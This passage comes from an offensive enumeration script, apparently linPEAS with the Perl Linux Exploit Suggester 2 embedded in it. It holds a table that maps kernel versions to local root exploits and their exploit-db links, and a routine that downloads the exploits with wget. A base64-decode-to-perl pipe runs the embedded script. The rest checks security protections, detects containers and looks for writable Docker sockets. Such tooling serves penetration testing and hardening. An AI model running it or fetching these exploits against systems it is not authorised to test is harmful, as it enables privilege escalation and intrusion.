    my $exploit_base = "www.exploit-db.com/exploits";
    my $download_base = "https://www.exploit-db.com/raw/";
    print "\n";

    foreach my $num (@selected) {
        my $mil = $applicable[$num-1]{mil};
        next if (!defined $mil);
        my ($exploit_num) = ($mil =~ /^.*\/([1-9][0-9]*)\/?$/);
        
        if ($exploit_num && index($mil, $exploit_base) != -1) {
            my $url = $download_base . $exploit_num;
            my $file = "exploit_$applicable[$num-1]{key}";
            print "  Downloading \e[00;33m$url\e[00m -> \e[00;33m$file\e[00m\n";
            system "wget $url -O $file > /dev/null 2>&1";
        }
        else {
            print "  No exploit code available for \e[00;33m$applicable[$num-1]{key}\e[00m\n"; 
        }
    }
    print "\n";
}

sub uniq {
    my %seen;
    grep !$seen{$_}++, @_;
}

sub usage {
print_banner();
print "  \e[00;35mUsage:\e[00m $0 [-h] [-k kernel] [-d]\n\n";
print "  \e[00;33m[\e[00m\e[00;31m-h\e[00m\e[00;33m]\e[00m Help (this message)\n";
print "  \e[00;33m[\e[00m\e[00;31m-k\e[00m\e[00;33m]\e[00m Kernel number (eg. 2.6.28)\n";
print "  \e[00;33m[\e[00m\e[00;31m-d\e[00m\e[00;33m]\e[00m Open exploit download menu\n\n";

print "  You can also provide a partial kernel version (eg. 2.4)\n";
print "  to see all exploits available.\n\n";
}

sub print_banner {
print "\n\e[00;33m  #############################\e[00m\n";
print "\e[1;31m    Linux Exploit Suggester $VERSION\e[00m\n";
print "\e[00;33m  #############################\e[00m\n\n";
}

sub get_exploits {
  return (
    'w00t' => {
        vuln => [
            '2.4.10', '2.4.16', '2.4.17', '2.4.18',
            '2.4.19', '2.4.20', '2.4.21',
        ]
    },
    'brk' => {
        vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
    },
    'ave' => { vuln => [ '2.4.19', '2.4.20' ] },

    'elflbl' => {
        vuln => ['2.4.29'],
        mil  => 'http://www.exploit-db.com/exploits/744',
    },

    'elfdump'      => { vuln => ['2.4.27'] },
    'elfcd'        => { vuln => ['2.6.12'] },
    'expand_stack' => { vuln => ['2.4.29'] },

    'h00lyshit' => {
        vuln => [
            '2.6.8',  '2.6.10', '2.6.11', '2.6.12',
            '2.6.13', '2.6.14', '2.6.15', '2.6.16',
        ],
        cve => '2006-3626',
        mil => 'http://www.exploit-db.com/exploits/2013',
    },

    'kdump' => { vuln => ['2.6.13'] },
    'km2'   => { vuln => [ '2.4.18', '2.4.22' ] },
    'krad' =>
      { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] },

    'krad3' => {
        vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ],
        mil => 'http://exploit-db.com/exploits/1397',
    },

    'local26' => { vuln => ['2.6.13'] },
    'loko'    => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] },

    'mremap_pte' => {
        vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ],
        mil => 'http://www.exploit-db.com/exploits/160',
    },

    'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] },
    'ong_bak'  => { vuln => ['2.6.5'] },
    'ptrace' =>
      { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] },
    'ptrace_kmod' => {
        vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
        cve  => '2007-4573',
    },
    'ptrace_kmod2' => {
        vuln => [
            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31',
            '2.6.32', '2.6.33', '2.6.34',
        ],
        alt => 'ia32syscall,robert_you_suck',
        mil => 'http://www.exploit-db.com/exploits/15023',
        cve => '2010-3301',
    },
    'ptrace24' => { vuln => ['2.4.9'] },
    'pwned'    => { vuln => ['2.6.11'] },
    'py2'      => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] },
    'raptor_prctl' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        cve  => '2006-2451',
        mil => 'http://www.exploit-db.com/exploits/2031',
    },
    'prctl' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2004',
    },
    'prctl2' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2005',
    },
    'prctl3' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2006',
    },
    'prctl4' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2011',
    },
    'remap'      => { vuln => ['2.4'] },
    'rip'        => { vuln => ['2.2'] },
    'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] },
    'uselib24' => {
        vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ]
    },
    'newsmp'   => { vuln => ['2.6'] },
    'smpracer' => { vuln => ['2.4.29'] },
    'loginx'   => { vuln => ['2.4.22'] },
    'exp.sh'   => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] },
    'vmsplice1' => {
        vuln => [
            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
            '2.6.23', '2.6.24', '2.6.24.1',
        ],
        alt => 'jessica biel',
        cve => '2008-0600',
        mil => 'http://www.exploit-db.com/exploits/5092',
    },
    'vmsplice2' => {
        vuln => [ '2.6.23', '2.6.24' ],
        alt  => 'diane_lane',
        cve  => '2008-0600',
        mil  => 'http://www.exploit-db.com/exploits/5093',
    },
    'vconsole' => {
        vuln => ['2.6'],
        cve  => '2009-1046',
    },
    'sctp' => {
        vuln => ['2.6.26'],
        cve  => '2008-4113',
    },
    'ftrex' => {
        vuln => [
            '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16',
            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
        ],
        cve => '2008-4210',
        mil => 'http://www.exploit-db.com/exploits/6851',
    },
    'exit_notify' => {
        vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
        mil => 'http://www.exploit-db.com/exploits/8369',
    },
    'udev' => {
        vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
        alt  => 'udev <1.4.1',
        cve  => '2009-1185',
        mil => 'http://www.exploit-db.com/exploits/8478',
    },

    'sock_sendpage2' => {
        vuln => [
            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0',  '2.6.1',
            '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',  '2.6.7',
            '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12', '2.6.13',
            '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
            '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
        ],
        alt => 'proto_ops',
        cve => '2009-2692',
        mil => 'http://www.exploit-db.com/exploits/9436',
    },

    'sock_sendpage' => {
        vuln => [
            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0',  '2.6.1',
            '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',  '2.6.7',
            '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12', '2.6.13',
            '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
            '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
        ],
        alt => 'wunderbar_emporium',
        cve => '2009-2692',
        mil => 'http://www.exploit-db.com/exploits/9435',
    },
    'udp_sendmsg_32bit' => {
        vuln => [
            '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',
            '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12',
            '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18',
            '2.6.19',
        ],
        cve => '2009-2698',
        mil =>
          'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c',
    },
    'pipe.c_32bit' => {
        vuln => [
            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16',
            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
            '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28',
            '2.6.29', '2.6.30', '2.6.31',
        ],
        cve => '2009-3547',
        mil =>
          'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c',
    },
    'do_pages_move' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31',
        ],
        alt => 'sieve',
        cve => '2010-0415',
        mil => 'Spenders Enlightenment',
    },
    'reiserfs' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
        ],
        cve => '2010-1146',
        mil => 'http://www.exploit-db.com/exploits/12130',
    },
    'can_bcm' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        cve => '2010-2959',
        mil => 'http://www.exploit-db.com/exploits/14814',
    },
    'rds' => {
        vuln => [
            '2.6.30', '2.6.31', '2.6.32', '2.6.33',
            '2.6.34', '2.6.35', '2.6.36',
        ],
        mil => 'http://www.exploit-db.com/exploits/15285',
        cve => '2010-3904',
    },
    'half_nelson1' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        alt => 'econet',
        cve => '2010-3848',
        mil => 'http://www.exploit-db.com/exploits/17787',
    },
    'half_nelson2' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        alt => 'econet',
        cve => '2010-3850',
        mil => 'http://www.exploit-db.com/exploits/17787',
    },
    'half_nelson3' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        alt => 'econet',
        cve => '2010-4073',
        mil => 'http://www.exploit-db.com/exploits/17787',
    },
    'caps_to_root' => {
        vuln => [ '2.6.34', '2.6.35', '2.6.36' ],
        cve  => 'n/a',
        mil => 'http://www.exploit-db.com/exploits/15916',
    },
    'american-sign-language' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        cve => '2010-4347',
        mil => 'http://www.securityfocus.com/bid/45408',
    },
    'pktcdvd' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        cve => '2010-3437',
        mil => 'http://www.exploit-db.com/exploits/15150',
    },
    'video4linux' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33',
        ],
        cve => '2010-3081',
        mil => 'http://www.exploit-db.com/exploits/15024',
    },
    'memodipper' => {
        vuln => [
            '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
            '3.0.5',  '3.0.6', '3.1.0',
        ],
        cve => '2012-0056',
        mil => 'http://www.exploit-db.com/exploits/18411',
    },
    'semtex' => {
        vuln => [
            '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2',
            '3.0.3',  '3.0.4',  '3.0.5',  '3.0.6', '3.1.0',
        ],
        cve => '2013-2094',
        mil => 'http://www.exploit-db.com/exploits/25444',
    },
    'perf_swevent' => {
        vuln => [
            '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5',
            '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0', '3.4.1',
            '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8',
            '3.4.9', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.1',
            '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
            '3.8.8', '3.8.9',
        ],
        cve => '2013-2094',
        mil => 'http://www.exploit-db.com/exploits/26131',
    },
    'msr' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28',
            '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
            '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0',
            '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',  '3.0.5',  '3.0.6',
            '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',  '3.5.0',  '3.6.0',
            '3.7.0',  '3.7.6',
        ],
        cve => '2013-0268',
        mil => 'http://www.exploit-db.com/exploits/27297',
    },
    'timeoutpwn' => {
        vuln => [
            '3.4.0',  '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.9', 
            '3.9.0',  '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.4.0',
            '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.5',  '3.8.6',  
            '3.8.9',  '3.9.0',  '3.9.6',  '3.10.0', '3.10.6', '3.11.0',
            '3.12.0', '3.13.0', '3.13.1'
        ],
        cve => '2014-0038',
        mil => 'http://www.exploit-db.com/exploits/31346',
    },
    'rawmodePTY' => {
        vuln => [
            '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
            '2.6.37', '2.6.38', '2.6.39', '3.14.0', '3.15.0'
        ],
        cve => '2014-0196',
        mil => 'http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c',
    },
    'overlayfs' => {
        vuln => [
            '3.13.0', '3.16.0', '3.19.0'
        ],
        cve => '2015-8660',
        mil => 'http://www.exploit-db.com/exploits/39230',
    },
    'pp_key' => {
        vuln => [
			'3.4.0',  '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.1',  
            '3.8.2',  '3.8.3',  '3.8.4',  '3.8.5',  '3.8.6',  '3.8.7',  
            '3.8.8',  '3.8.9',  '3.9.0',  '3.9.6',  '3.10.0', '3.10.6', 
            '3.11.0', '3.12.0', '3.13.0', '3.13.1'
        ],
        cve => '2016-0728',
        mil => 'http://www.exploit-db.com/exploits/39277',
    },
    'dirty_cow' => {
        vuln => [
            '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', 
			'2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', 
            '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38', 
            '2.6.39', '3.0.0',  '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',  
            '3.0.5',  '3.0.6',  '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',  
            '3.5.0',  '3.6.0',  '3.7.0',  '3.7.6',  '3.8.0',  '3.9.0'
        ],
        cve => '2016-5195',
        mil => 'http://www.exploit-db.com/exploits/40616',
    },
    'af_packet' => {
        vuln => ['4.4.0' ],
        cve => '2016-8655',
        mil => 'http://www.exploit-db.com/exploits/40871',
    },
    'packet_set_ring' => {
        vuln => ['4.8.0' ],
        cve => '2017-7308',
        mil => 'http://www.exploit-db.com/exploits/41994',
    },
    'clone_newuser' => {
        vuln => [
            '3.3.5', '3.3.4', '3.3.2', '3.2.13', '3.2.9', '3.2.1', 
            '3.1.8', '3.0.5', '3.0.4', '3.0.2', '3.0.1', '3.2', '3.0.1', '3.0'
        ],
        cve => 'N\A',
        mil => 'http://www.exploit-db.com/exploits/38390',
    },
    'get_rekt' => {
        vuln => [
            '4.4.0', '4.8.0', '4.10.0', '4.13.0'
        ],
        cve => '2017-16695',
        mil => 'http://www.exploit-db.com/exploits/45010',
    },
    'exploit_x' => {
        vuln => [
            '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
            '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32',
            '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38',
            '2.6.39', '3.0.0',  '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',
            '3.0.5',  '3.0.6',  '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',
            '3.5.0',  '3.6.0',  '3.7.0',  '3.7.6',  '3.8.0',  '3.9.0',
            '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0',
            '3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0',  '4.1.0',
            '4.2.0',  '4.3.0',  '4.4.0',  '4.5.0',  '4.6.0',  '4.7.0'
        ],
        cve => '2018-14665',
        mil => 'http://www.exploit-db.com/exploits/45697',
    },
  );
}

__END__
=head1 NAME

linux_exploit_suggester-2.pl - A local exploit suggester for linux

=head1 DESCRIPTION

This perl script will enumerate the possible exploits available for a given kernel version

=head1 USAGE

[-h] Help (this message)
[-k] Kernel number (eg. 2.6.28)
[-d] Open exploit download menu

You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.

=head1 AUTHOR

Jonathan Donas (c) 2019

=cut

=head1 LICENSE

 Linux Exploit Suggester 2

 This program is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.

 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.
        
 You should have received a copy of the GNU General Public License along
 with this program; if not, write to the Free Software Foundation, Inc.,
 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

=cut
"
echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf
'\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" |
sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g" echo "" fi if [ "$MACPEAS" ] && [
"$(command -v brew 2>/dev/null)" ]; then print_2title "Brew Doctor Suggestions"
brew doctor echo "" fi #-- SY) AppArmor print_2title "Protections" print_list
"AppArmor enabled? .............. "$NC if [ "$(command -v aa-status
2>/dev/null)" ]; then aa-status 2>&1 | sed "s,disabled,${SED_RED}," elif [
"$(command -v apparmor_status 2>/dev/null)" ]; then apparmor_status 2>&1 | sed
"s,disabled,${SED_RED}," elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then ls
-d /etc/apparmor* else echo_not_found "AppArmor" fi #-- SY) AppArmor2 print_list
"AppArmor profile? .............. "$NC (cat /proc/self/attr/current 2>/dev/null
|| echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed
"s,kernel,${SED_GREEN}," #-- SY) LinuxONE print_list "is linuxONE?
................... "$NC ( (uname -a | grep "s390x" >/dev/null 2>&1) && echo
"Yes" || echo_not_found "s390x") #-- SY) grsecurity print_list "grsecurity
present? ............ "$NC ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep
"grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found
"grsecurity") #-- SY) PaX print_list "PaX bins present? .............. "$NC
(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found
"PaX") #-- SY) Execshield print_list "Execshield enabled? ............ "$NC
(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield")
| sed "s,=0,${SED_RED}," #-- SY) SElinux print_list "SELinux enabled?
............... "$NC (sestatus 2>/dev/null || echo_not_found "sestatus") | sed
"s,disabled,${SED_RED}," #-- SY) Seccomp print_list "Seccomp enabled?
............... "$NC ([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v
0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed
"s,enabled,${SED_GREEN}," #-- SY) AppArmor print_list "User namespace?
................ "$NC if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo
"enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed
"s,disabled,${SED_RED},"; fi #-- SY) cgroup2 print_list "Cgroup2 enabled?
............... "$NC ([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] &&
echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed
"s,enabled,${SED_GREEN}," #-- SY) Gatekeeper if [ "$MACPEAS" ]; then print_list
"Gatekeeper enabled? .......... "$NC (spctl --status 2>/dev/null ||
echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," print_list "sleepimage
encrypted? ........ "$NC (sysctl vm.swapusage | grep "encrypted" | sed
"s,encrypted,${SED_GREEN},") || echo_no print_list "XProtect?
.................... "$NC (system_profiler SPInstallHistoryDataType 2>/dev/null
| grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
print_list "SIP enabled? ................. "$NC csrutil status | sed
"s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no print_list
"Connected to JAMF? ........... "$NC warn_exec jamf checkJSSConnection
print_list "Connected to AD? ............. "$NC dsconfigad -show && echo "" ||
echo_no fi #-- SY) ASLR print_list "Is ASLR enabled? ............... "$NC
ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) if [ -z "$ASLR" ];
then echo_not_found "/proc/sys/kernel/randomize_va_space"; else if [ "$ASLR" -eq
"0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi echo "" fi #--
SY) Printer print_list "Printer? ....................... "$NC (lpstat -a ||
system_profiler SPPrintersDataType || echo_no) 2>/dev/null #-- SY) Running in a
virtual environment print_list "Is this a virtual machine? ..... "$NC
hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) if [
"$(command -v systemd-detect-virt 2>/dev/null)" ]; then
detectedvirt=$(systemd-detect-virt) if [ "$hypervisorflag" ]; then printf
$RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi else if [
"$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi fi
fi echo '' echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read
"asd"; fi if echo $CHECKS | grep -q container; then print_title "Container"
########################################### #---------) Container functions
(---------# ########################################### containerCheck() {
inContainer="" containerType="$(echo_no)" # Are we inside docker? if [ -f
"/.dockerenv" ] || grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || grep -qai
docker /proc/self/cgroup 2>/dev/null || [ "$(find / -maxdepth 3 -name
'*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then inContainer="1"
containerType="docker\n" fi # Are we inside kubernetes? if grep "/kubepod"
/proc/1/cgroup -qa 2>/dev/null || grep -qai kubepods /proc/self/cgroup
2>/dev/null; then inContainer="1" if [ "$containerType" ]; then
containerType="$containerType (kubernetes)\n" else containerType="kubernetes\n"
fi fi # Inside concourse? if grep "/concourse" /proc/1/mounts -qa 2>/dev/null;
then inContainer="1" if [ "$containerType" ]; then containerType="$containerType
(concourse)\n" fi fi # Are we inside LXC? if env | grep "container=lxc" -qa
2>/dev/null || grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then inContainer="1"
containerType="lxc\n" fi # Are we inside podman? if env | grep -qa
"container=podman" 2>/dev/null || grep -qa "container=podman" /proc/1/environ
2>/dev/null; then inContainer="1" containerType="podman\n" fi # Check for other
container platforms that report themselves in PID 1 env if [ -z "$inContainer"
]; then if grep -a 'container=' /proc/1/environ 2>/dev/null; then
inContainer="1" containerType="$(grep -a 'container=' /proc/1/environ | cut -d=
-f2)\n" fi fi } inDockerGroup() { DOCKER_GROUP="No" if groups 2>/dev/null | grep
-q '\bdocker\b'; then DOCKER_GROUP="Yes" fi } checkDockerRootless() {
DOCKER_ROOTLESS="No" if docker info 2>/dev/null|grep -q rootless; then
DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)" fi } enumerateDockerSockets() {
dockerVersion="$(echo_not_found)" if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then
SEARCHED_DOCKER_SOCKETS="1" for int_sock in $(find / ! -path "/sys/*" -type s
-name "docker.sock" -o -name "docker.socket" -o -name "dockershim.sock" -o -name
"containerd.sock" -o -name "crio.sock" -o -name "frakti.sock" -o -name
"rktlet.sock" 2>/dev/null); do if ! [ "$IAMROOT" ] && [ -w "$int_sock" ]; then
if echo "$int_sock" | grep -Eq "docker"; then dock_sock="$int_sock" echo "You
have write permissions over Docker socket $dock_sock" | sed -${E}
"s,$dock_sock,${SED_RED_YELLOW},g" echo "Docker enummeration:"
docker_enumerated="" if [ "$(command -v curl)" ]; then sockInfoResponse="$(curl
-s --unix-socket $dock_sock http://localhost/info)" dockerVersion=$(echo
